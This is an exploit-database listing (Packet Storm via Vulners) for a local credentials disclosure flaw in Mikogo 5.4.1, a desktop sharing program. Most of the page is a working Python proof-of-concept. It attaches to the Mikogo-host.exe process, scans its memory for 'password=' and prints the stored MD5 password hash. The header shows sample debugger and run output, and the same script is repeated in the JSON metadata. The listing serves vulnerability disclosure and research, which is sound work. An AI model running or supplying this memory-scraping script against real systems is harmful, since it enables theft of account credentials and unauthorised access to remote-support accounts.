Search...

Mikogo 5.4.1.160608 Local Credentials Disclosure

2017-10-24T00:00:00

ID PACKETSTORM:144715
Type packetstorm
Reporter Gjoko Krstic
Modified 2017-10-24T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#  
#  
# Mikogo 5.4.1.160608 Local Credentials Disclosure  
#  
#  
# Vendor: Snapview GmbH  
# Product web page: https://www.mikogo.com  
# Affected version: 5.4.1.160608  
#  
# Summary: Mikogo is a desktop sharing software application for  
# web conferencing and remote support, and is provided by the online  
# collaboration provider, BeamYourScreen GmbH. Mikogo provides  
# its software as native downloads for Windows, Mac OS X, Linux,  
# iOS and Android.  
#  
# Desc: Mikogo is vulnerable to local credentials disclosure, the  
# supplied password is stored as a MD5 hash format in memory process.  
# A potential attacker could reveal the supplied password hash and  
# re-use it or store it via the configuration file in order to gain  
# access to the account.  
#  
# ------------------------------------------------------------------  
#  
# 0:017&gt; s -a 0 L?80000000 "password="  
# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang  
# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma  
# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811  
# 0:017&gt; da 06a422b3  
# 06a422b3 "password=482C811DA5D5B4BC6D497FF"  
# 06a422d3 "A98491E38...."  
#  
# ...  
# ...  
#  
# C:\Users\Charlie\Desktop&gt;python mikogo_mem.py  
# [~] Searching for pid by process name 'Mikogo-host.exe'..  
# [+] Found process with pid #1116  
# [~] Trying to read memory for pid #1116  
# [+] Credentials found!  
# ----------------------------------------  
# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38  
#  
# ------------------------------------------------------------------  
#  
# Tested on: Microsoft Windows 7 Professional SP1 (EN)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2017-5439  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php  
#  
#  
# 03.07.2017  
#  
#  
# Based on Yakir Wizman's PoC:  
#  
  
  
import time  
import urllib  
from winappdbg import Debug, Process  
  
username = ''  
password = ''  
found = 0  
filename = "Mikogo-host.exe"  
process_pid = 0  
memory_dump = []  
  
debug = Debug()  
try:  
print "[~] Searching for pid by process name '%s'.." % (filename)  
time.sleep(1)  
debug.system.scan_processes()  
for (process, process_name) in debug.system.find_processes_by_filename(filename):  
process_pid = process.get_pid()  
if process_pid is not 0:  
print "[+] Found process with pid #%d" % (process_pid)  
time.sleep(1)  
print "[~] Trying to read memory for pid #%d" % (process_pid)  
  
process = Process(process_pid)  
for address in process.search_bytes('\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'):  
memory_dump.append(process.read(address,42))  
for i in range(len(memory_dump)):  
password = memory_dump[i].split('password=')[1]  
if password !='':  
found = 1  
print "[+] Credentials found!\r\n----------------------------------------"  
print "[+] MD5 Password: %s" % password  
if found == 0:  
print "[-] Credentials not found! Make sure the client is connected."  
else:  
print "[-] No process found with name '%s'." % (filename)  
  
debug.loop()  
finally:  
debug.stop()  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:144715", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mikogo 5.4.1.160608 Local Credentials Disclosure", "description": "", "published": "2017-10-24T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/144715/Mikogo-5.4.1.160608-Local-Credentials-Disclosure.html", "reporter": "Gjoko Krstic", "references": [], "cvelist": [], "lastseen": "2017-10-24T13:59:55", "viewCount": 21, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-10-24T13:59:55", "rev": 2}, "dependencies": {"references": [], "modified": "2017-10-24T13:59:55", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/144715/ZSL-2017-5439.txt", "sourceData": "`#!/usr/bin/env python \n# \n# \n# Mikogo 5.4.1.160608 Local Credentials Disclosure \n# \n# \n# Vendor: Snapview GmbH \n# Product web page: https://www.mikogo.com \n# Affected version: 5.4.1.160608 \n# \n# Summary: Mikogo is a desktop sharing software application for \n# web conferencing and remote support, and is provided by the online \n# collaboration provider, BeamYourScreen GmbH. Mikogo provides \n# its software as native downloads for Windows, Mac OS X, Linux, \n# iOS and Android. \n# \n# Desc: Mikogo is vulnerable to local credentials disclosure, the \n# supplied password is stored as a MD5 hash format in memory process. \n# A potential attacker could reveal the supplied password hash and \n# re-use it or store it via the configuration file in order to gain \n# access to the account. \n# \n# ------------------------------------------------------------------ \n# \n# 0:017> s -a 0 L?80000000 \"password=\" \n# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang \n# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma \n# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811 \n# 0:017> da 06a422b3 \n# 06a422b3 \"password=482C811DA5D5B4BC6D497FF\" \n# 06a422d3 \"A98491E38....\" \n# \n# ... \n# ... \n# \n# C:\\Users\\Charlie\\Desktop>python mikogo_mem.py \n# [~] Searching for pid by process name 'Mikogo-host.exe'.. \n# [+] Found process with pid #1116 \n# [~] Trying to read memory for pid #1116 \n# [+] Credentials found! \n# ---------------------------------------- \n# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38 \n# \n# ------------------------------------------------------------------ \n# \n# Tested on: Microsoft Windows 7 Professional SP1 (EN) \n# \n# \n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \n# @zeroscience \n# \n# \n# Advisory ID: ZSL-2017-5439 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php \n# \n# \n# 03.07.2017 \n# \n# \n# Based on Yakir Wizman's PoC: \n# \n \n \nimport time \nimport urllib \nfrom winappdbg import Debug, Process \n \nusername = '' \npassword = '' \nfound = 0 \nfilename = \"Mikogo-host.exe\" \nprocess_pid = 0 \nmemory_dump = [] \n \ndebug = Debug() \ntry: \nprint \"[~] Searching for pid by process name '%s'..\" % (filename) \ntime.sleep(1) \ndebug.system.scan_processes() \nfor (process, process_name) in debug.system.find_processes_by_filename(filename): \nprocess_pid = process.get_pid() \nif process_pid is not 0: \nprint \"[+] Found process with pid #%d\" % (process_pid) \ntime.sleep(1) \nprint \"[~] Trying to read memory for pid #%d\" % (process_pid) \n \nprocess = Process(process_pid) \nfor address in process.search_bytes('\\x0a\\x70\\x61\\x73\\x73\\x77\\x6f\\x72\\x64\\x3d'): \nmemory_dump.append(process.read(address,42)) \nfor i in range(len(memory_dump)): \npassword = memory_dump[i].split('password=')[1] \nif password !='': \nfound = 1 \nprint \"[+] Credentials found!\\r\\n----------------------------------------\" \nprint \"[+] MD5 Password: %s\" % password \nif found == 0: \nprint \"[-] Credentials not found! Make sure the client is connected.\" \nelse: \nprint \"[-] No process found with name '%s'.\" % (filename) \n \ndebug.loop() \nfinally: \ndebug.stop() \n`\n", "immutableFields": []}